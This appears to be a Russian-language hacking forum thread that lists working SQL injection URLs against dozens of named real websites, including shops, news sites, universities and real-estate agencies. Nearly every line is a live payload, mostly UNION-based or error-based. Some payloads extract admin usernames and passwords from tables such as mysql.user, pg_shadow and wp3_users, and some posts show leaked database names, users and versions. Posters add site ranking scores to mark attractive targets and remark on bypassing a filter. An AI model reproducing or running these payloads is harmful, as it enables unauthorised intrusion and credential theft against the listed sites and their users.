SQL Инъекции

http://www.tradegrupp.ru/news.php?nid=25+and+1=0+union+select+1,concat_ws%280x3a,user,password%29,3,4,5,6+from+mysql.user+limit+1,1--

 

medpoisk.ru
Тиц 650
PR 5

Code:

http://www.medpoisk.ru/catalog_view.php?region_id=-2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4--

fmjd.org
Тиц 110
PR 5

Code:

http://fmjd.org/news.php?nid=-421+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10--

mzma.net
Тиц 120
PR 1

Code:

http://www.mzma.net/club/articles/read.php?id=-100+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

irsp.org.pk
PR 4

Code:

http://irsp.org.pk/news.php?nid=-15+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

 

http://www.hometrend.ca/product.php?productId=83&catId=-0102'+union+select+1,concat_ws(0x3a3a,version(),user(),database())+--+

http://www.utmsports.com/athlete.cfm?id=-1057+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),8,9,10,11,12,13,14,15+--+

 

http://www.corfida.org/index.php?id=-5+union+select+unhex(hex(concat_ws(0x3a,0x78,database(),user(),version())))/*

Database: corfida_org_-_cms
User: corfida_@localhost
Version: 4.1.22

http://www.eurobirding.com/birdingmagazines/artinfo.php?id=-9142+union+select+concat_ws(0x3a,database(),user(),version())+--+

Database: eurobirdingcom01
User: [email protected]
Version: 5.0.90-log

http://www.aoecs.org/news/news.php?id=-41+/*!and*/1=2+/*!union*/select/*!1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8*/+--+

Database: aoecs_current
User: aoecs_aoecs@localhost
Version: 5.1.50

Стоит фильтр.Но обходится довольно таки легко.

 

sayitontheweb.com
PR 5

Code:

http://www.sayitontheweb.com/~smith/projectdetails.php?id=-26+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

allanhouser.com
PR 5

Code:

http://www.allanhouser.com/newsDetail.php?id=-21+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8--

southernpowerlifting.com
PR 3

Code:

http://www.southernpowerlifting.com/contest_results.php?id=-121+union+select+1,2,3,concat_ws(0x3a,user(),database(),version())--

feicuidao.com
PR 4

Code:

http://www.feicuidao.com/jqzx_look.php?id=-11+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,1

cyberspacesupport.com
PR 3

Code:

http://www.cyberspacesupport.com/question.php?question_id=-15681+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--

 

pr4 тиц90

http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201,2,3,4,'5',6,7,8,9%23

http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201,2,3,4,0x27,6,7,8,9%23 -> 2-d order inj.

 

HTML:

http://www.lpb-company.ru/enc/?igla=-1+union+select+all+1,2,3,table_name,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.columns+order+by+1+desc+limit+0,1+--+

 

Я вернулся после небольшой паузы)

Code:

http://www.beigbeder.net/pages/livre.php?id=1-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

Code:

http://www.les-racines-du-ciel.com/boutiques.php?num=87-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Code:

http://paroles.webfenua.com/chanson.php?id=2233-999.9+union+select+1,2,user%28%29,4--

 

http://concursos.colombiaaprende.edu.co/expediciones_botanicas/ver_reverdecimiento.php?id=274+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--

http://www.verdadcolombia.org/archivos/VerDocumento.php?Id=11+and+1=0+union+select+1,2,3,4,5,group_concat(user,char(58),pass)+from+user_seg

 

http://www.sdintlgroup.net/properties-info.php?id=56+union+select+1,2,version(),concat_ws(0x3a,id,username,password),5,6,7,8,9,10,11,12+from+members+limit+0,1

http://www.vfdnet.de/verband/nordrhein-westfalen/index.php?verbandid=9&info_id=4231'+or+1+group+by+concat(concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),floor(rand(0)*2))having+min(0)+or+1+--+

http://www.westgold.de/html/info.php?id=105+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

http://www.sportklettern-hessen.de/home/info.php?id=-185+union+select+1,2,3,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),5,6,7+--+

http://www.divid-pro.de/product_info.php?id_product=-3+union+select+1,2,version(),4,5,@@version_compile_os,7,concat(user(),0x3a3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32

http://www.campaignsitebuilder.com/templates/displayfiles/Tmpl13.asp?siteid=524&pageid=8510&trial=false&blogid=338-999.9+union+select+@@version,2,3,4,5,6,7,8,9,10--

http://www.flvwdialog.de/php/db/info.php?id=-5711+union+select+1,2,3,4,5,6,7,8,concat(@i:=0x00,@o:=0x0d0a,benchmark(977,@o:=CONCAT(@o,0x0d0a,(SELECT @i:=concat(BenutzerID,0x3a,Benutzername,0x3a,Passwort,0x0a7c) from us_benutzer where BenutzerID>@i order by BenutzerID LIMIT 1))),@o),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90+--+

 

Code:

http://www.lsp-fr.com/rdv_full.php?num=9-999.9+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12--

Code:

http://www.phytotherapia.eu/informations_medicales.php?num_info=509-999.9+union+select+1,2,version%28%29,4--

+ еще

 

Code:

http://www.theark.cc/mymovie_detail.php?id=1+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

Database Version: 5.0.77
Database name: mymedia
User name: [email protected]

Code:

http://hummeraccessories.cc/viewProduct.php?id=1+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+LIMIT+1,1-- 

Database Version: 5.0.91-log
Database name: hummerguys
User name: [email protected]

 

Шопы

Code:

http://www.barrywalker.com/cat.asp?cat=-12+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5--

Code:

http://www.ishraqa.com/newlook/Art_Cat.asp?Cat_Id=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10--

Code:

http://www.hightechcredit.com/products.php?subcat=224+and+1=0+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

Code:

http://prima-footwear.com/products.php?subcat_id=-107+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

Code:

http://www.protech.net/product.php?product_id=-92+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

Code:

http://www.antique-tables.co.uk/productdetails.asp?prodid=-159+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Code:

http://www.antique-tables.co.uk/productdetails.asp?prodid=-159+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

P.S. баянов вроде нет

 

Code:

http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619' or 1 group by concat((select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate(0x70617373776f7264,column_name)!=0 and table_schema=0x6169345f656e74657270726973655f6462/**/limit/**/0,1),floor(rand(0)*2))having min(0) or 1-- 1

http://www.cornerstone-properties.com/agents_details.php?agent_ID=1758'%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201

http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619%27%20or%201%20gro up%20by%20concat%28%28select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate%280x70617373776f7264,column_name%29!=0%20an d%20table_schema=0x6169345f656e74657270726973655f6 462/**/limit/**/0,1%29,floor%28rand%280%29*2%29%29having%20min%280 %29%20or%201--%201

http://www.barkalowhomes.com/agents_details.php?agent_ID=6244%27%20or%201%20gro up%20by%20concat%28%28select/**/column_name/**/from/**/information_Schema.columns/**/where/**/table_name=0x6169635f636c69656e7473/**/limit/**/26,1%29,floor%28rand%280%29*2%29%29having%20min%28 0%29%20or%201--%201

http://www.gloor.com/agents_details.php?agent_ID=480%27%20or%201%20grou p%20by%20concat%28version%28%29,floor%28rand%280%2 9*2%29%29having%20min%280%29%20or%201--%201

http://www.mockrealty.com/agents_details.php?agent_ID=1522%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201

http://www.phippsrealty.com/agents_details.php?agent_ID=3192%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201

http://www.nixtann.com/agents_details.php?agent_ID=8432%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201

http://www.marron-gildea.com/agents_details.php?agent_ID=4010%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201

http://www.sirentechnology.co.uk/product_info.php/products_id/550%27%20or%201%20group%20by%20concat%28version%28 %29,floor%28rand%280%29*2%29%29having%20min%280%29 %20or%201--%201

http://www.interbatteries.ca/product_info.php/products_id/2598%27%20or%201%20group%20by%20concat%28version%2 8%29,floor%28rand%280%29*2%29%29having%20min%280%2 9%20or%201--%201

http://www.art21galerie.de/artinfo.php?id=80%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&pic=47

http://www.coolthings.nl/artinfo.php?id=113%20union%20select%201,2,3,concat _ws(0x3a,login_name,password),5,6,7,8%20from%20cms _auth_user--

http://www.collectart.de/artinfo.php?id=96%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&lang=de

http://galerie-fries.de/artInfo.php?id=-610%20union%20select%201,version(),3,4,5,6--

http://art26.de/artinfo.php?id=10%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&pic=15&lang=

http://www.access-networks.eu/artinfo.php?id=-514%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,0,0,1--&_cat=1

http://moto-mondo.com/modeli.php?marka_id=-5%20union%20select%201,concat_ws(0x3a,iduser,passw d),3%20from%20admin--

http://www.mypromofits.com/newinfo.php?id=-102%20union%20select%201,version(),3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8--

http://www.joebar.org/p.php?ID=-5%20union%20select%201,2,version(),4,5,6,7,8,9--

http://redwheelweiser.com/p.php?id=-2%20union%20select%201,version(),3,4,5,6,7,8,9--

http://www.edinburghnapierdegreeshow.com/2009/des/s.php?id=16%20or%201%20group%20by%20concat((select user_pass from wp3_users limit 0,1),floor(rand(0)*2))having%20min(0)%20or%201--%201

http://www.fairfaxtimes.com/cms/story.php?id=1050'%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201

P.S Боянов нет!

 

http://sig.ucaldas.edu.co/gestionDocumental/MECI/formAuditoria.php?codDoc=504+union+select+null,null,cast(usename||chr(58)||passwd as int),null,null,null+from+pg_shadow--+

http://sig.ucaldas.edu.co/info

 

Code:

http://ring.abandonware.it/commenti.php?num=-1+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16--

Database Version: 4.0.30-standard-log
Database name: Sql10475_5
User name: [email protected]

 

fc-utd.co.uk
PR 5

Code:

http://www.fc-utd.co.uk/players.php?player_id=-155+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--

mereste.net
PR 3

Code:

http://www.mereste.net/weblog.php?num=-325+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

bungeeco.com
PR 2

Code:

http://www.bungeeco.com/product_detail.php?id=-374+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17--

www.panabodehomes.com
PR 2

Code:

http://www.panabodehomes.com/whats_new.php?article_id=-14+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

villasignori.it
PR 1

Code:

http://www.villasignori.it/galleria_detail.php?id=-11+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--

 

http://www.latinamericanpost.com/index.php?mod=seccion&secc=2+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--

 

Code:

http://www.ipodarcade.com/game.php?id=597-999.9+union+select+1,2,concat%28user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10--

ipodarc_ac883@localhostipodarc_db5.0.91-community

Code:

http://www.tenebril.com/src/info.php?id=101500900-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

Code:

http://www.sligotoday.ie/details.php?id=5784-999.9+union+select+1,concat%28version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9--

5.0.83-community-logdb1062096_sligotodayu1062096_user@172.16.4.31

 

http://www.cafespb.ru/resto.php?id=715+and+1=0+UnIon+selECt+1,2,group_concat(schema_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+information_schema.schemata+--+


ТИЦ : 100 PR: 2